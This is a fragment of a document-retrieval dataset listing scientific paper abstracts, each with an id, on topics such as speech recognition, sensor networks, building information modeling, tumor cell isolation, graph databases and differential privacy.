"text": "Language models are used in automatic transcription system to resolve ambiguities. This is done by limiting the vocabulary of words that can be recognized as well as estimating the n-gram probability of the words in the given text. In the context of historical documents, a non-unified spelling and the limited amount of written text pose a substantial problem for the selection of the recognizable vocabulary as well as the computation of the word probabilities. In this paper we propose for the transcription of historical Spanish text to keep the corpus for the n-gram limited to a sample of the target text, but expand the vocabulary with words gathered from external resources. We analyze the performance of such a transcription system with different sizes of external vocabularies and demonstrate the applicability and the significant increase in recognition accuracy of using up to 300 thousand external words.",
"title": ""
},
{
"docid": "db5865f8f8701e949a9bb2f41eb97244",
"text": "This paper proposes a method for constructing local image descriptors which efficiently encode texture information and are suitable for histogram based representation of image regions. The method computes a binary code for each pixel by linearly projecting local image patches onto a subspace, whose basis vectors are learnt from natural images via independent component analysis, and by binarizing the coordinates in this basis via thresholding. The length of the binary code string is determined by the number of basis vectors. Image regions can be conveniently represented by histograms of pixels' binary codes. Our method is inspired by other descriptors which produce binary codes, such as local binary pattern and local phase quantization. However, instead of heuristic code constructions, the proposed approach is based on statistics of natural images and this improves its modeling capacity. The experimental results show that our method improves accuracy in texture recognition tasks compared to the state-of-the-art.",
"title": ""
},
{
"docid": "412951e42529d7862cb0bcbaf5bd9f97",
"text": "Wireless Sensor Network is an emerging field which is accomplishing much importance because of its vast contribution in varieties of applications. Wireless Sensor Networks are used to monitor a given field of interest for changes in the environment. Coverage is one of the main active research interests in WSN.In this paper we aim to review the coverage problem In WSN and the strategies that are used in solving coverage problem in WSN.These strategies studied are used during deployment phase of the network. Besides this we also outlined some basic design considerations in coverage of WSN.We also provide a brief summary of various coverage issues and the various approaches for coverage in Sensor network. Keywords— Coverage; Wireless sensor networks: energy efficiency; sensor; area coverage; target Coverage.",
"title": ""
},
{
"docid": "4306bc8a6f1e1bab2ffeb175d7dfeb0f",
"text": "This paper describes the design and evaluation of a method for developing a chat-oriented dialog system by utilizing real human-to-human conversation examples from movie scripts and Twitter conversations. The aim of the proposed method is to build a conversational agent that can interact with users in as natural a fashion as possible, while reducing the time requirement for database design and collection. A number of the challenging design issues we faced are described, including (1) constructing an appropriate dialog corpora from raw movie scripts and Twitter data, and (2) developing an multi domain chat-oriented dialog management system which can retrieve a proper system response based on the current user query. To build a dialog corpus, we propose a unit of conversation called a tri-turn (a trigram conversation turn), as well as extraction and semantic similarity analysis techniques to help ensure that the content extracted from raw movie/drama script files forms appropriate dialog-pair (query-response) examples. The constructed dialog corpora are then utilized in a data-driven dialog management system. Here, various approaches are investigated including example-based (EBDM) and response generation using phrase-based statistical machine translation (SMT). In particular, we use two EBDM: syntactic-semantic similarity retrieval and TF-IDF based cosine similarity retrieval. Experiments are conducted to compare and contrast EBDM and SMT approaches in building a chat-oriented dialog system, and we investigate a combined method that addresses the advantages and disadvantages of both approaches. System performance was evaluated based on objective metrics (semantic similarity and cosine similarity) and human subjective evaluation from a small user study. Experimental results show that the proposed filtering approach effectively improve the performance. Furthermore, the results also show that by combing both EBDM and SMT approaches, we could overcome the shortcomings of each. key words: dialog corpora, response generation, example-based dialog modeling, semantic similarity, cosine similarity, machine translation",
"title": ""
},
{
"docid": "f7c73ca2b6cd6da6fec42076910ed3ec",
"text": "The goal of rating-based recommender systems is to make personalized predictions and recommendations for individual users by leveraging the preferences of a community of users with respect to a collection of items like songs or movies. Recommender systems are often based on intricate statistical models that are estimated from data sets containing a very high proportion of missing ratings. This work describes evidence of a basic incompatibility between the properties of recommender system data sets and the assumptions required for valid estimation and evaluation of statistical models in the presence of missing data. We discuss the implications of this problem and describe extended modelling and evaluation frameworks that attempt to circumvent it. We present prediction and ranking results showing that models developed and tested under these extended frameworks can significantly outperform standard models.",
"title": ""
},
{
"docid": "c56e82343720095e74ec4a50a2190f7f",
"text": "In this paper, we present an accelerometer-based pen-type sensing device and a user-independent hand gesture recognition algorithm. Users can hold the device to perform hand gestures with their preferred handheld styles. Gestures in our system are divided into two types: the basic gesture and the complex gesture, which can be represented as a basic gesture sequence. A dictionary of 24 gestures, including 8 basic gestures and 16 complex gestures, is defined. An effective segmentation algorithm is developed to identify individual basic gesture motion intervals automatically. Through segmentation, each complex gesture is segmented into several basic gestures. Based on the kinematics characteristics of the basic gesture, 25 features are extracted to train the feedforward neural network model. For basic gesture recognition, the input gestures are classified directly by the feedforward neural network classifier. Nevertheless, the input complex gestures go through an additional similarity matching procedure to identify the most similar sequences. The proposed recognition algorithm achieves almost perfect user-dependent and user-independent recognition accuracies for both basic and complex gestures. Experimental results based on 5 subjects, totaling 1600 trajectories, have successfully validated the effectiveness of the feedforward neural network and similarity matching-based gesture recognition algorithm.",
"title": ""
},
{
"docid": "5b0530f94f476754034c92292e02b390",
"text": "Many seemingly simple questions that individual users face in their daily lives may actually require substantial number of computing resources to identify the right answers. For example, a user may want to determine the right thermostat settings for different rooms of a house based on a tolerance range such that the energy consumption and costs can be maximally reduced while still offering comfortable temperatures in the house. Such answers can be determined through simulations. However, some simulation models as in this example are stochastic, which require the execution of a large number of simulation tasks and aggregation of results to ascertain if the outcomes lie within specified confidence intervals. Some other simulation models, such as the study of traffic conditions using simulations may need multiple instances to be executed for a number of different parameters. Cloud computing has opened up new avenues for individuals and organizations Shashank Shekhar shashank.shekhar@vanderbilt.edu Hamzah Abdel-Aziz hamzah.abdelaziz@vanderbilt.edu Michael Walker michael.a.walker.1@vanderbilt.edu Faruk Caglar faruk.caglar@vanderbilt.edu Aniruddha Gokhale a.gokhale@vanderbilt.edu Xenofon Koutsoukos xenonfon.koutsoukos@vanderbilt.edu 1 Department of Electrical Engineering and Computer Science, Vanderbilt University, Nashville, TN 37235, USA with limited resources to obtain answers to problems that hitherto required expensive and computationally-intensive resources. This paper presents SIMaaS, which is a cloudbased Simulation-as-a-Service to address these challenges. We demonstrate how lightweight solutions using Linux containers (e.g., Docker) are better suited to support such services instead of heavyweight hypervisor-based solutions, which are shown to incur substantial overhead in provisioning virtual machines on-demand. Empirical results validating our claims are presented in the context of two",
"title": ""
},
{
"docid": "2f1690d7e1ee4aeca5be28faf80917fa",
"text": "The millimeter wave (mmWave) bands offer the possibility of orders of magnitude greater throughput for fifth-generation (5G) cellular systems. However, since mmWave signals are highly susceptible to blockage, channel quality on any one mmWave link can be extremely intermittent. This paper implements a novel dual connectivity protocol that enables mobile user equipment devices to maintain physical layer connections to 4G and 5G cells simultaneously. A novel uplink control signaling system combined with a local coordinator enables rapid path switching in the event of failures on any one link. This paper provides the first comprehensive end-to-end evaluation of handover mechanisms in mmWave cellular systems. The simulation framework includes detailed measurement-based channel models to realistically capture spatial dynamics of blocking events, as well as the full details of Medium Access Control, Radio Link Control, and transport protocols. Compared with conventional handover mechanisms, this paper reveals significant benefits of the proposed method under several metrics.",
"title": ""
},
{
"docid": "7999684c9cf090c897056b9eb6929af3",
"text": "Ethnically differentiated societies are often regarded as dysfunctional, with poor economic performance and a high risk of violent civil conflict. I argue that this is not well-founded. I distinguish between dominance, in which one group constitutes a majority, and fractionalisation, in which there are many small groups. In terms of overall economic performance, I show that both theoretically and empirically, fractionalisation is normally unproblematic in democracies, although it can be damaging in dictatorships. Fractionalised societies have worse public sector performance, but this is offset by better private sector performance. Societies characterised by dominance are in principle likely to have worse economic performance, but empirically the effect is weak. In terms of the risk of civil war, I show that both theoretically and empirically fractionalisation actually makes societies safer, while dominance increases the risk of conflict. A policy implication is that fractionalised societies are viable and secession should be discouraged. P ub lic D is cl os ur e A ut ho riz ed",
"title": ""
},
{
"docid": "c34d4d0e3dcf52aba737a87877d55f49",
"text": "Building Information Modeling is based on the idea of the continuous use of digital building models throughout the entire lifecycle of a built facility, starting from the early conceptual design and detailed design phases, to the construction phase, and the long phase of operation. BIM significantly improves information flow between stakeholders involved at all stages, resulting in an increase in efficiency by reducing the laborious and error-prone manual re-entering of information that dominates conventional paper-based workflows. Thanks to its many advantages, BIM is already practiced in many construction projects throughout the entire world. However, the fragmented nature of the construction industry still impedes its more widespread use. Government initiatives around the world play an important role in increasing BIM adoption: as the largest client of the construction industry in many countries, the state has the power to significantly change its work practices. This chapter discusses the motivation for applying BIM, offers a detailed definition of BIM along with an overview of typical use cases, describes the common BIM maturity grades and reports on BIM adoption levels in various countries around the globe. A. Borrmann ( ) Chair of Computational Modeling and Simulation, Technical University of Munich, München, Germany e-mail: andre.borrmann@tum.de M. König Chair of Computing in Engineering, Ruhr University Bochum, Bochum, Germany e-mail: koenig@inf.bi.rub.de C. Koch Chair of Intelligent Technical Design, Bauhaus-Universität Weimar, Weimar, Germany e-mail: c.koch@uni-weimar.de J. Beetz Chair of Design Computation, RWTH Aachen University, Aachen, Germany e-mail: j.beetz@caad.arch.rwth-aachen.de © Springer International Publishing AG, part of Springer Nature 2018 A. Borrmann et al. (eds.), Building Information Modeling, https://doi.org/10.1007/978-3-319-92862-3_1 1 2 A. Borrmann et al. 1.1 Building Information Modeling: Why? In the last decade, digitalization has transformed a wide range of industrial sectors, resulting in a tremendous increase in productivity, product quality and product variety. In the Architecture, Engineering, Construction (AEC) industry, digital tools are increasingly adopted for designing, constructing and operating buildings and infrastructure assets. However, the continuous use of digital information along the entire process chain falls significantly behind other industry domains. All too often, valuable information is lost because information is still predominantly handed over in the form of drawings, either as physical printed plots on paper or in a digital but limited format. Such disruptions in the information flow occur across the entire lifecycle of a built facility: in its design, construction and operation phases as well as in the very important handovers between these phases. The planning and realization of built facilities is a complex undertaking involving a wide range of stakeholders from different fields of expertise. For a successful construction project, a continuous reconciliation and intense exchange of information among these stakeholders is necessary. Currently, this typically involves the handover of technical drawings of the construction project in graphical manner in the form of horizontal and vertical sections, views and detail drawings. The software used to create these drawings imitate the centuries-old way of working using a drawing board. However, line drawings cannot be comprehensively understood by computers. The information they contain can only be partially interpreted and processed by computational methods. Basing the information flow on drawings alone therefore fails to harness the great potential of information technology for supporting project management and building operation. A key problem is that the consistency of the diverse technical drawings can only be checked manually. This is a potentially massive source of errors, particularly if we take into account that the drawings are typically created by experts from different design disciplines and across multiple companies. Design changes are particularly challenging: if they are not continuously tracked and relayed to all related plans, inconsistencies can easily arise and often remain undiscovered until the actual construction – where they then incur significant extra costs for ad-hoc solutions on site. In conventional practice, design changes are marked only by means of revision clouds in the drawings, which can be hard to detect and ambiguous. The limited information depth of technical drawings also has a significant drawback in that information on the building design cannot be directly used by downstream applications for any kind of analysis, calculation and simulation, but must be re-entered manually which again requires unnecessary additional work and is a further source of errors. The same holds true for the information handover to the building owner after the construction is finished. He must invest considerable effort into extracting the required information for operating the building from the drawings and documents and enter it into a facility management system. At each of 1 Building Information Modeling: Why? What? How? 3 Conceptual Design Construction Detailed Design Operation Time Conventional workflows Digital workflows Information loss Project information Fig. 1.1 Loss of information caused by disruptions in the digital information flow. (Based on Eastman et al. 2008) these information exchange points, data that was once available in digital form is lost and has to be laboriously re-created (Fig. 1.1). This is where Building Information Modeling comes into play. By applying the BIM method, a much more profound use of computer technology in the design, engineering, construction and operation of built facilities is realized. Instead of recording information in drawings, BIM stores, maintains and exchanges information using comprehensive digital representations: the building information models. This approach dramatically improves the coordination of the design activities, the integration of simulations, the setup and control of the construction process, as well as the handover of building information to the operator. By reducing the manual re-entering of data to a minimum and enabling the consequent re-use of digital information, laborious and error-prone work is avoided, which in turn results in an increase in productivity and quality in construction projects. Other industry sectors, such as the automotive industry, have already undergone the transition to digitized, model-based product development and manufacturing which allowed them to achieve significant efficiency gains (Kagermann 2015). The Architecture Engineering and Construction (AEC) industry, however, has its own particularly challenging boundary conditions: first and foremost, the process and value creation chain is not controlled by one company, but is dispersed across a large number of enterprises including architectural offices, engineering consultancies, and construction firms. These typically cooperate only for the duration of an individual construction project and not for a longer period of time. Consequently, there are a large number of interfaces in the ad-hoc network of companies where digital information has to be handed over. As these information flows must be supervised and controlled by a central instance, the onus is on the building owner to specify and enforce the use of Building Information Modeling. 4 A. Borrmann et al. 1.2 Building Information Modeling: What? A Building Information Model is a comprehensive digital representation of a built facility with great information depth. It typically includes the three-dimensional geometry of the building components at a defined level of detail. In addition, it also comprises non-physical objects, such as spaces and zones, a hierarchical project structure, or schedules. Objects are typically associated with a well-defined set of semantic information, such as the component type, materials, technical properties, or costs, as well as the relationships between the components and other physical or logical entities (Fig. 1.2). The term Building Information Modeling (BIM) consequently describes both the process of creating such digital building models as well as the process of maintaining, using and exchanging them throughout the entire lifetime of the built facility (Fig. 1.3). The US National Building Information Modeling Standard defines BIM as follows (NIBS 2012): Building Information Modeling (BIM) is a digital representation of physical and functional characteristics of a facility. A BIM is a shared knowledge resource for information about a facility forming a reliable basis for decisions during its life-cycle; defined as existing from earliest conception to demolition. A basic premise of BIM is collaboration by different stakeholders at different phases of the life cycle of a facility to insert, extract, update or modify information in the BIM to support and reflect the roles of that stakeholder. Fig. 1.2 A BIM model comprises both the 3D geometry of each building element as well as a rich set of semantic information provided by attributes and relationships 1 Building Information Modeling: Why? What? How? 5 Construction Detailed Design Operation Conceptual Design Modification Demolition Facility Management, Maintenance, Repair Cost estimation Design Options Progress Monitoring Simulations and Analyses Logistics Process Simulation Coordination Visualization Spatial Program",
"title": ""
},
{
"docid": "486417082d921eba9320172a349ee28f",
"text": "Circulating tumor cells (CTCs) are a popular topic in cancer research because they can be obtained by liquid biopsy, a minimally invasive procedure with more sample accessibility than tissue biopsy, to monitor a patient's condition. Over the past decades, CTC research has covered a wide variety of topics such as enumeration, profiling, and correlation between CTC number and patient overall survival. It is important to isolate and enrich CTCs before performing CTC analysis because CTCs in the blood stream are very rare (0⁻10 CTCs/mL of blood). Among the various approaches to separating CTCs, here, we review the research trends in the isolation and analysis of CTCs using microfluidics. Microfluidics provides many attractive advantages for CTC studies such as continuous sample processing to reduce target cell loss and easy integration of various functions into a chip, making \"do-everything-on-a-chip\" possible. However, tumor cells obtained from different sites within a tumor exhibit heterogenetic features. Thus, heterogeneous CTC profiling should be conducted at a single-cell level after isolation to guide the optimal therapeutic path. We describe the studies on single-CTC analysis based on microfluidic devices. Additionally, as a critical concern in CTC studies, we explain the use of CTCs in cancer research, despite their rarity and heterogeneity, compared with other currently emerging circulating biomarkers, including exosomes and cell-free DNA (cfDNA). Finally, the commercialization of products for CTC separation and analysis is discussed.",
"title": ""
},
{
"docid": "6a922e97c878c4d1769e1101f5026cf9",
"text": "Human activities create waste, and it is the way these wastes are handled, stored, collected and disposed of, which can pose risks to the environment and to public health. Where intense human activities concentrate, such as in urban centres, appropriate and safe solid waste management (SWM) are of utmost importance to allow healthy living conditions for the population. This fact has been acknowledged by most governments, however many municipalities are struggling to provide even the most basic services. Typically one to two thirds of the solid waste generated is not collected (World Resources Institute, et al., 1996). As a result, the uncollected waste, which is often also mixed with human and animal excreta, is dumped indiscriminately in the streets and in drains, so contributing to flooding, breeding of insect and rodent vectors and the spread of diseases (UNEP-IETC, 1996). Most of the municipal solid waste in low-income Asian countries which is collected is dumped on land in a more or less uncontrolled manner. Such inadequate waste disposal creates serious environmental problems that affect health of humans and animals and cause serious economic and other welfare losses. The environmental degradation caused by inadequate disposal of waste can be expressed by the contamination of surface and ground water through leachate, soil contamination through direct waste contact or leachate, air pollution by burning of wastes, spreading of diseases by different vectors like birds, insects and rodents, or uncontrolled release of methan by anaerobic decomposition of waste",
"title": ""
},
{
"docid": "0c509f98c65a48c31d32c0c510b4c13f",
"text": "An EM based straight forward design and pattern synthesis technique for series fed microstrip patch array antennas is proposed. An optimization of each antenna element (λ/4-transmission line, λ/2-patch, λ/4-transmission line) of the array is performed separately. By introducing an equivalent circuit along with an EM parameter extraction method, each antenna element can be optimized for its resonance frequency and taper amplitude, so to shape the aperture distribution for the cascaded elements. It will be shown that the array design based on the multiplication of element factor and array factor fails in case of patch width tapering, due to the inconsistency of the element patterns. To overcome this problem a line width tapering is suggested which keeps the element patterns nearly constant while still providing a broad amplitude taper range. A symmetric 10 element antenna array with a Chebyshev tapering (-20dB side lobe level) operating at 5.8 GHz has been designed, compared for the two tapering methods and validated with measurement.",
"title": ""
},
{
"docid": "7a8a98b91680cbc63594cd898c3052c8",
"text": "Policy-based access control is a technology that achieves separation of concerns through evaluating an externalized policy at each access attempt. While this approach has been well-established for request-response applications, it is not supported for database queries of data-driven applications, especially for attribute-based policies. In particular, search operations for such applications involve poor scalability with regard to the data set size for this approach, because they are influenced by dynamic runtime conditions. This paper proposes a scalable application-level middleware solution that performs runtime injection of the appropriate rules into the original search query, so that the result set of the search includes only items to which the subject is entitled. Our evaluation shows that our method scales far better than current state of practice approach that supports policy-based access control.",
"title": ""
},
{
"docid": "c8ae7431c6be27e9b427fd022db03a53",
"text": "Deep learning systems have dramatically improved the accuracy of speech recognition, and various deep architectures and learning methods have been developed with distinct strengths and weaknesses in recent years. How can ensemble learning be applied to these varying deep learning systems to achieve greater recognition accuracy is the focus of this paper. We develop and report linear and log-linear stacking methods for ensemble learning with applications specifically to speechclass posterior probabilities as computed by the convolutional, recurrent, and fully-connected deep neural networks. Convex optimization problems are formulated and solved, with analytical formulas derived for training the ensemble-learning parameters. Experimental results demonstrate a significant increase in phone recognition accuracy after stacking the deep learning subsystems that use different mechanisms for computing high-level, hierarchical features from the raw acoustic signals in speech.",
"title": ""
}
] | scidocsrr |
b36344dedd09ce3caa3fa0cc48a69d5a | Predicting Sufficient Annotation Strength for Interactive Foreground Segmentation | [
{
"docid": "ac740402c3e733af4d690e34e567fabe",
"text": "We address the problem of semantic segmentation: classifying each pixel in an image according to the semantic class it belongs to (e.g. dog, road, car). Most existing methods train from fully supervised images, where each pixel is annotated by a class label. To reduce the annotation effort, recently a few weakly supervised approaches emerged. These require only image labels indicating which classes are present. Although their performance reaches a satisfactory level, there is still a substantial gap between the accuracy of fully and weakly supervised methods. We address this gap with a novel active learning method specifically suited for this setting. We model the problem as a pairwise CRF and cast active learning as finding its most informative nodes. These nodes induce the largest expected change in the overall CRF state, after revealing their true label. Our criterion is equivalent to maximizing an upper-bound on accuracy gain. Experiments on two data-sets show that our method achieves 97% percent of the accuracy of the corresponding fully supervised model, while querying less than 17% of the (super-)pixel labels.",
"title": ""
}
] | [
{
"docid": "7abdd1fc5f2a8c5b7b19a6a30eadad0a",
"text": "This Paper investigate action recognition by using Extreme Gradient Boosting (XGBoost). XGBoost is a supervised classification technique using an ensemble of decision trees. In this study, we also compare the performance of Xboost using another machine learning techniques Support Vector Machine (SVM) and Naive Bayes (NB). The experimental study on the human action dataset shows that XGBoost better as compared to SVM and NB in classification accuracy. Although takes more computational time the XGBoost performs good classification on action recognition.",
"title": ""
},
{
"docid": "bee9fe64d8287da932baea386e583af8",
"text": "Shapelets are discriminative sub-sequences of time series that best predict the target variable. For this reason, shapelet discovery has recently attracted considerable interest within the time-series research community. Currently shapelets are found by evaluating the prediction qualities of numerous candidates extracted from the series segments. In contrast to the state-of-the-art, this paper proposes a novel perspective in terms of learning shapelets. A new mathematical formalization of the task via a classification objective function is proposed and a tailored stochastic gradient learning algorithm is applied. The proposed method enables learning near-to-optimal shapelets directly without the need to try out lots of candidates. Furthermore, our method can learn true top-K shapelets by capturing their interaction. Extensive experimentation demonstrates statistically significant improvement in terms of wins and ranks against 13 baselines over 28 time-series datasets.",
"title": ""
},
{
"docid": "fafbcccd49d324ea45dbe4c341d4c7d9",
"text": "This paper discusses the technical issues that were required to adapt a KUKA Robocoaster for use as a real-time motion simulator. Within this context, the paper addresses the physical modifications and the software control structure that were needed to have a flexible and safe experimental setup. It also addresses the delays and transfer function of the system. The paper is divided into two sections. The first section describes the control and safety structures of the MPI Motion Simulator. The second section shows measurements of latencies and frequency responses of the motion simulator. The results show that the frequency responses of the MPI Motion Simulator compare favorably with high-end Stewart Platforms, and therefore demonstrate the suitability of robot-based motion simulators for flight simulation.",
"title": ""
},
{
"docid": "dafd771706b3d0cfb903e76bb9b35165",
"text": "This study examined how social media use related to sleep quality, self-esteem, anxiety and depression in 467 Scottish adolescents. We measured overall social media use, nighttime-specific social media use, emotional investment in social media, sleep quality, self-esteem and levels of anxiety and depression. Adolescents who used social media more - both overall and at night - and those who were more emotionally invested in social media experienced poorer sleep quality, lower self-esteem and higher levels of anxiety and depression. Nighttime-specific social media use predicted poorer sleep quality after controlling for anxiety, depression and self-esteem. These findings contribute to the growing body of evidence that social media use is related to various aspects of wellbeing in adolescents. In addition, our results indicate that nighttime-specific social media use and emotional investment in social media are two important factors that merit further investigation in relation to adolescent sleep and wellbeing.",
"title": ""
},
{
"docid": "89e11f208c3c96e2b55b00ffbf7da59b",
"text": "In data mining, regression analysis is a computational tool that predicts continuous output variables from a number of independent input variables, by approximating their complex inner relationship. A large number of methods have been successfully proposed, based on various methodologies, including linear regression, support vector regression, neural network, piece-wise regression etc. In terms of piece-wise regression, the existing methods in literature are usually restricted to problems of very small scale, due to their inherent non-linear nature. In this work, a more efficient piece-wise regression method is introduced based on a novel integer linear programming formulation. The proposed method partitions one input variable into multiple mutually exclusive segments, and fits one multivariate linear regression function per segment to minimise the total absolute error. Assuming both the single partition feature and the number of regions are known, the mixed integer linear model is proposed to simultaneously determine the locations of multiple break-points and regression coefficients for each segment. Furthermore, an efficient heuristic procedure is presented to identify the key partition feature and final number of break-points. 7 real world problems covering several application domains have been used to demon∗Corresponding author: Tel.: +442076792563; Fax.: +442073882348 Email addresses: lingjian.yang.10@ucl.ac.uk (Lingjian Yang), s.liu@ucl.ac.uk (Songsong Liu), sophia.tsoka@kcl.ac.uk (Sophia Tsoka), l.papageorgiou@ucl.ac.uk (Lazaros G. Papageorgiou) Preprint submitted to Journal of Expert Systems with Applications August 12, 2015 Accepted Manuscript of a publised work apears its final form in Expert Systems with Applications. To access the final edited and published work see http://dx.doi.org/10.1016/j.eswa.2015.08.034. Open Access under CC-BY-NC-ND user license (http://creativecommons.org/licenses/by-nc-nd/4.0/).",
"title": ""
},
{
"docid": "9b504f633488016fad865dee6fbdf3ef",
"text": "Transmission lines is the important factor of the power system. Transmission and distribution lines has good contribution in the generating unit and consumers to obtain the continuity of electric supply. To economically transfer high power between systems and from control generating field. Transmission line run over hundreds of kilometers to supply electrical power to the consumers. It is a required for industries to detect the faults in the power system as early as possible. “Fault Detection and Auto Line Distribution System With GSM Module” is a automation technique used for fault detection in AC supply and auto sharing of power. The significance undetectable faults is that they represent a serious public safety hazard as well as a risk of arcing ignition of fires. This paper represents under voltage and over current fault detection. It is useful in technology to provide many applications like home, industry etc..",
"title": ""
},
{
"docid": "d931f6f9960e8688c2339a27148efe74",
"text": "Most knowledge on the Web is encoded as natural language text, which is convenient for human users but very difficult for software agents to understand. Even with increased use of XML-encoded information, software agents still need to process the tags and literal symbols using application dependent semantics. The Semantic Web offers an approach in which knowledge can be published by and shared among agents using symbols with a well defined, machine-interpretable semantics. The Semantic Web is a “web of data” in that (i) both ontologies and instance data are published in a distributed fashion; (ii) symbols are either ‘literals’ or universally addressable ‘resources’ (URI references) each of which comes with unique semantics; and (iii) information is semi-structured. The Friend-of-a-Friend (FOAF) project (http://www.foafproject.org/) is a good application of the Semantic Web in which users publish their personal profiles by instantiating the foaf:Personclass and adding various properties drawn from any number of ontologies. The Semantic Web’s distributed nature raises significant data access problems – how can an agent discover, index, search and navigate knowledge on the Semantic Web? Swoogle (Dinget al. 2004) was developed to facilitate webscale semantic web data access by providing these services to both human and software agents. It focuses on two levels of knowledge granularity: URI based semantic web vocabulary andsemantic web documents (SWDs), i.e., RDF and OWL documents encoded in XML, NTriples or N3. Figure 1 shows Swoogle’s architecture. The discovery component automatically discovers and revisits SWDs using a set of integrated web crawlers. The digest component computes metadata for SWDs and semantic web terms (SWTs) as well as identifies relations among them, e.g., “an SWD instantiates an SWT class”, and “an SWT class is the domain of an SWT property”. The analysiscomponent uses cached SWDs and their metadata to derive analytical reports, such as classifying ontologies among SWDs and ranking SWDs by their importance. The s rvicecomponent sup-",
"title": ""
},
{
"docid": "6c5969169086a3b412e27f630c054c60",
"text": "Soft continuum manipulators have the advantage of being more compliant and having more degrees of freedom than rigid redundant manipulators. This attribute should allow soft manipulators to autonomously execute highly dexterous tasks. However, current approaches to motion planning, inverse kinematics, and even design limit the capacity of soft manipulators to take full advantage of their inherent compliance. We provide a computational approach to whole arm planning for a soft planar manipulator that advances the arm's end effector pose in task space while simultaneously considering the arm's entire envelope in proximity to a confined environment. The algorithm solves a series of constrained optimization problems to determine locally optimal inverse kinematics. Due to inherent limitations in modeling the kinematics of a highly compliant soft robot and the local optimality of the planner's solutions, we also rely on the increased softness of our newly designed manipulator to accomplish the whole arm task, namely the arm's ability to harmlessly collide with the environment. We detail the design and fabrication of the new modular manipulator as well as the planner's central algorithm. We experimentally validate our approach by showing that the robotic system is capable of autonomously advancing the soft arm through a pipe-like environment in order to reach distinct goal states.",
"title": ""
},
{
"docid": "5e7acc47170cbe30d330096b8aa87956",
"text": "For years we have known that cortical neurons collectively have synchronous or oscillatory patterns of activity, the frequencies and temporal dynamics of which are associated with distinct behavioural states. Although the function of these oscillations has remained obscure, recent experimental and theoretical results indicate that correlated fluctuations might be important for cortical processes, such as attention, that control the flow of information in the brain.",
"title": ""
},
{
"docid": "da18fa8e30c58f6b0039d8b1dc4b11a0",
"text": "Customer churn prediction is one of the key steps to maximize the value of customers for an enterprise. It is difficult to get satisfactory prediction effect by traditional models constructed on the assumption that the training and test data are subject to the same distribution, because the customers usually come from different districts and may be subject to different distributions in reality. This study proposes a feature-selection-based dynamic transfer ensemble (FSDTE) model that aims to introduce transfer learning theory for utilizing the customer data in both the target and related source domains. The model mainly conducts a two-layer feature selection. In the first layer, an initial feature subset is selected by GMDH-type neural network only in the target domain. In the second layer, several appropriate patterns from the source domain to target training set are selected, and some features with higher mutual information between them and the class variable are combined with the initial subset to construct a new feature subset. The selection in the second layer is repeated several times to generate a series of new feature subsets, and then, we train a base classifier in each one. Finally, a best base classifier is selected dynamically for each test pattern. The experimental results in two customer churn prediction datasets show that FSDTE can achieve better performance compared with the traditional churn prediction strategies, as well as three existing transfer learning strategies.",
"title": ""
},
{
"docid": "cdc3b46933db0c88f482ded1dcdff9e6",
"text": "Overvoltages in low voltage (LV) feeders with high penetration of photovoltaics (PV) are usually prevented by limiting the feeder's PV capacity to very conservative values, even if the critical periods rarely occur. This paper discusses the use of droop-based active power curtailment techniques for overvoltage prevention in radial LV feeders as a means for increasing the installed PV capacity and energy yield. Two schemes are proposed and tested in a typical 240-V/75-kVA Canadian suburban distribution feeder with 12 houses with roof-top PV systems. In the first scheme, all PV inverters have the same droop coefficients. In the second, the droop coefficients are different so as to share the total active power curtailed among all PV inverters/houses. Simulation results demonstrate the effectiveness of the proposed schemes and that the option of sharing the power curtailment among all customers comes at the cost of an overall higher amount of power curtailed.",
"title": ""
},
{
"docid": "639cccdcd0294c3c32714d0a6e01ef35",
"text": "The Center of Remote Sensing of Ice Sheets (CReSIS) is studying the use of the TETwalker mobile robot developed by NASA/Goddard Space Flight Center for polar seismic data acquisition. This paper discusses the design process for deploying seismic sensors within the 4-TETwalker mobile robot architecture. The 4-TETwalkerpsilas center payload node was chosen as the deployment medium. An alternative method of deploying seismic sensors that rest on the surface is included. Detailed models were also developed to study robot mobility dynamics and the deployment process. Finally, potential power options of solar sheaths and harvesting vibration energy are proposed.",
"title": ""
},
{
"docid": "5589615ee24bf5ba1ac5def2c5bc556e",
"text": "The computer industry is at a major inflection point in its hardware roadmap due to the end of a decades-long trend of exponentially increasing clock frequencies. Instead, future computer systems are expected to be built using homogeneous and heterogeneous many-core processors with 10’s to 100’s of cores per chip, and complex hardware designs to address the challenges of concurrency, energy efficiency and resiliency. Unlike previous generations of hardware evolution, this shift towards many-core computing will have a profound impact on software. These software challenges are further compounded by the need to enable parallelism in workloads and application domains that traditionally did not have to worry about multiprocessor parallelism in the past. A recent trend in mainstream desktop systems is the use of graphics processor units (GPUs) to obtain order-of-magnitude performance improvements relative to general-purpose CPUs. Unfortunately, hybrid programming models that support multithreaded execution on CPUs in parallel with CUDA execution on GPUs prove to be too complex for use by mainstream programmers and domain experts, especially when targeting platforms with multiple CPU cores and multiple GPU devices. In this paper, we extend past work on Intel’s Concurrent Collections (CnC) programming model to address the hybrid programming challenge using a model called CnC-CUDA. CnC is a declarative and implicitly parallel coordination language that supports flexible combinations of task and data parallelism while retaining determinism. CnC computations are built using steps that are related by data and control dependence edges, which are represented by a CnC graph. The CnC-CUDA extensions in this paper include the definition of multithreaded steps for execution on GPUs, and automatic generation of data and control flow between CPU steps and GPU steps. Experimental results show that this approach can yield significant performance benefits with both GPU execution and hybrid CPU/GPU execution.",
"title": ""
},
{
"docid": "b9f7c3cbf856ff9a64d7286c883e2640",
"text": "Graph database models can be defined as those in which data structures for the schema and instances are modeled as graphs or generalizations of them, and data manipulation is expressed by graph-oriented operations and type constructors. These models took off in the eighties and early nineties alongside object-oriented models. Their influence gradually died out with the emergence of other database models, in particular geographical, spatial, semistructured, and XML. Recently, the need to manage information with graph-like nature has reestablished the relevance of this area. The main objective of this survey is to present the work that has been conducted in the area of graph database modeling, concentrating on data structures, query languages, and integrity constraints.",
"title": ""
},
{
"docid": "deb04bcfb18a3350135c0b1ef155a11a",
"text": "Data privacy has been an important research topic in the security, theory and database communities in the last few decades. However, many existing studies have restrictive assumptions regarding the adversary's prior knowledge, meaning that they preserve individuals' privacy only when the adversary has rather limited background information about the sensitive data, or only uses certain kinds of attacks. Recently, differential privacy has emerged as a new paradigm for privacy protection with very conservative assumptions about the adversary's prior knowledge. Since its proposal, differential privacy had been gaining attention in many fields of computer science, and is considered among the most promising paradigms for privacy-preserving data publication and analysis. In this tutorial, we will motivate its introduction as a replacement for other paradigms, present the basics of the differential privacy model from a database perspective, describe the state of the art in differential privacy research, explain the limitations and shortcomings of differential privacy, and discuss open problems for future research.",
"title": ""
},
{
"docid": "82c9c8a7a9dccfa59b09df595de6235c",
